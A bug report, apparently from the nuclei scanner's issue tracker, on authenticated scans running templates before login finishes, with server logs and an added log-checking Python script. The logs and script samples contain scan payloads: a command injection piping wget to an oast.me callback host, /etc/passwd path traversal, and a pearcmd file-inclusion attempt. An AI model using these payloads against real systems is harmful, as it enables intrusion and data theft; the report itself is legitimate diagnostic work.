Open
Labels
Type: Bug (Inconsistencies or issues which will cause an issue or problem for users or implementors.)
Description
Is there an existing issue for this?
- I have searched the existing issues.
Current Behavior
When running an authenticated scan using a secret file, nuclei starts executing templates immediately, before the secret file finishes, causing some requests to not be authenticated.
command that I'm running:
nuclei3.4.dev -secret-file django-login.yaml -target http://localhost:8000/ -v
When I print the server logs I see all requests before the secret file finishes as unauthenticated (see AnonymousUser):
15:32:48.443 | WARNING | django.request - Not Found: /wp-content/plugins/flash-album-gallery/readme.txt
15:32:48.446 | WARNING | django.server - "GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1" 404 23770
15:32:48.450 | WARNING | django.request - Not Found: /wp-content/plugins/skysa-official/readme.txt
AnonymousUser
AnonymousUser
15:32:48.491 | WARNING | django.server - "GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1" 404 23750
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
15:32:48.554 | WARNING | django.request - Not Found: /login-x.php
AnonymousUser
15:32:48.641 | WARNING | django.server - "GET /login-x.php HTTP/1.1" 404 23619
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
15:32:48.946 | WARNING | django.request - Not Found: /guest_auth/guestIsUp.php
15:32:48.950 | WARNING | django.server - "POST /guest_auth/guestIsUp.php HTTP/1.1" 404 23672
15:32:48.950 | INFO | django.server - code 400, message Bad HTTP/0.9 request type ('mac=1&ip=127.0.0.1|wget')
15:32:48.950 | WARNING | django.server - "mac=1&ip=127.0.0.1|wget d46bv7aqko33m6d2te7g4b8fu93o1zo7w.oast.me" 400 -
AnonymousUser
15:32:48.994 | WARNING | django.request - Not Found: /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx
15:32:48.996 | WARNING | django.server - "POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1" 404 23884
AnonymousUser
15:32:49.290 | INFO | django.server - "POST /accounts/login/ HTTP/1.1" 302 0
<engbot@example.com>
15:32:49.476 | WARNING | django.request - Not Found: /wp-content/plugins/featurific-for-wordpress/readme.txt
15:32:49.482 | WARNING | django.server - "GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1" 404 23791
<engbot@example.com>
15:32:49.592 | WARNING | django.request - Not Found: /wp-content/plugins/clickdesk-live-support-chat/readme.txt
15:32:49.599 | WARNING | django.server - "GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1" 404 23803
15:32:49.655 | WARNING | django.request - Not Found: /lcms/index.php
15:32:49.657 | WARNING | django.server - "POST /lcms/index.php HTTP/1.1" 404 23632
<engbot@example.com>
15:32:49.683 | WARNING | django.security.csrf - Forbidden (CSRF cookie not set.): /
15:32:49.690 | WARNING | django.request - Not Found: /wp-content/plugins/all-in-one-event-calendar/readme.txt
15:32:49.694 | INFO | django.server - "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+sBV3dCd1eI.log HTTP/1.1" 302 0
15:32:49.695 | WARNING | django.server - "GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1" 404 23795
<engbot@example.com>
Only once POST /accounts/login/ finishes do the requests start being authenticated (see engbot@example.com) instead of Anonymous user.
Expected Behavior
I would expect nuclei to first run the secret-file and only after it finishes start running the other templates. This was the behavior on Nuclei 3.4.7, before the authenticated scan regression in 3.4.8.
This is how the server logs look when I run the same code on 3.4.7:
nuclei3.4.7 -secret-file django-login.yaml -target http://localhost:8000/ -v
AnonymousUser
15:50:23.744 | INFO | django.server - "GET /accounts/login/ HTTP/1.1" 200 25860
AnonymousUser
15:50:23.931 | INFO | django.server - "POST /accounts/login/ HTTP/1.1" 302 0
<engbot@example.com>
15:50:25.028 | WARNING | django.request - Not Found: /export/classroom-course-statistics
<engbot@example.com>
<engbot@example.com>
15:50:25.031 | WARNING | django.server - "GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1" 404 23797
<engbot@example.com>
15:50:25.058 | WARNING | django.request - Not Found: /cgi-bin/rpc
15:50:25.059 | WARNING | django.server - "POST /cgi-bin/rpc HTTP/1.1" 404 23618
<engbot@example.com>
<engbot@example.com>
<engbot@example.com>
15:50:25.364 | WARNING | django.request - Not Found: /zentao/user-login.html
15:50:25.365 | WARNING | django.server - "POST /zentao/user-login.html HTTP/1.1" 404 23663
15:50:25.370 | WARNING | django.request - Not Found: /general/index/UploadFile.php
15:50:25.371 | WARNING | django.request - Not Found: /webadm/
Steps To Reproduce
- Run nuclei with a secret-file
nuclei -secret-file django-login.yaml -target http://localhost:8000/ -v
Relevant log output
Environment
- OS: macOS
- Nuclei: 3.4.10 53af79a39290c86857f433bb2f40e4567982fed0
- Go: go version go1.24.2 darwin/arm64
Anything else?
No response
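A check for the ordering problem described in this report, as an added example that is not part of the original issue or of nuclei: it splits a Django server log at the first successful login POST and lists the scan requests logged before it. The function name, the rule that a 302 on the login POST means success, and the abridged sample logs are assumptions of this example.

```python
import re

# django.server access-log lines in the format shown in the report.
ACCESS_RE = re.compile(
    r'^(?P<ts>\d{2}:\d{2}:\d{2}\.\d{3}) \| \w+ \| django\.server - '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def audit_auth_ordering(lines, login_path="/accounts/login/",
                        anon_marker="AnonymousUser"):
    """Return login timestamp, requests logged before it, and the number
    of anonymous-user marker lines printed after it."""
    login_ts, early, anon_after = None, [], 0
    for raw in lines:
        line = raw.strip()
        if line == anon_marker:
            if login_ts is not None:
                anon_after += 1
            continue
        m = ACCESS_RE.match(line)
        if not m or login_ts is not None:
            continue
        path = m["path"].split("?", 1)[0]
        if path != login_path:
            # Any non-login request seen before login ran unauthenticated.
            early.append((m["ts"], m["method"], m["path"]))
        elif m["method"] == "POST" and m["status"] == "302":
            # Assumption: this app answers a successful login with a 302.
            login_ts = m["ts"]
    return {"login_ts": login_ts, "early": early,
            "anon_after_login": anon_after}

# Constructed samples, abridged from the log lines quoted in the report.
REGRESSED = """\
15:32:48.446 | WARNING | django.server - "GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1" 404 23770
AnonymousUser
15:32:48.641 | WARNING | django.server - "GET /login-x.php HTTP/1.1" 404 23619
AnonymousUser
15:32:49.290 | INFO | django.server - "POST /accounts/login/ HTTP/1.1" 302 0
<engbot@example.com>
15:32:49.482 | WARNING | django.server - "GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1" 404 23791
"""
ORDERED = """\
AnonymousUser
15:50:23.744 | INFO | django.server - "GET /accounts/login/ HTTP/1.1" 200 25860
AnonymousUser
15:50:23.931 | INFO | django.server - "POST /accounts/login/ HTTP/1.1" 302 0
<engbot@example.com>
15:50:25.031 | WARNING | django.server - "GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1" 404 23797
"""
```

A non-empty `early` list means part of the scan ran without a session, so findings that require authentication may have been missed for those templates.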